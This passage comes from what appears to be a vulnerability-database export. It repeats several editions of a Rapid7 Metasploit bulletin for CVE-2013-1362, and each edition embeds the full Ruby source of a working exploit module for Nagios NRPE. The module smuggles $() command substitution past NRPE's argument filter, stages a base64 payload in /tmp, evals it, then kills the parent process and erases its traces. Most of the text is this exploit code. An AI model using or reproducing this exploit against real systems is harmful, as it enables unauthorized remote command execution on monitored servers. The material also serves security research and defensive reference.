# TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-01-26T14:07:32", "differentElements": ["modified", "published"], "edition": 26}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-01-26T16:05:08", "history": [], "viewCount": 61, "enchantments": {"score": {"value": 6.0, "modified": "2018-01-26T16:05:08"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-01-26T16:05:08", "differentElements": ["modified", "published"], "edition": 27}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-02-02T02:05:06", "history": [], "viewCount": 61, "enchantments": {"score": {"value": 6.0, "modified": "2018-02-02T02:05:06"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-02-02T02:05:06", "differentElements": ["modified", "published"], "edition": 28}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-02-02T04:04:42", "history": [], "viewCount": 61, "enchantments": {"score": {"value": 6.0, "modified": "2018-02-02T04:04:42"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-02-02T04:04:42", "differentElements": ["modified", "published"], "edition": 29}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-02-05T04:13:24", "history": [], "viewCount": 61, "enchantments": {"score": {"value": 6.0, "modified": "2018-02-05T04:13:24"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-02-05T04:13:24", "differentElements": ["modified", "published"], "edition": 30}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-02-05T06:13:17", "history": [], "viewCount": 61, "enchantments": {"score": {"value": 6.0, "modified": "2018-02-05T06:13:17"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # 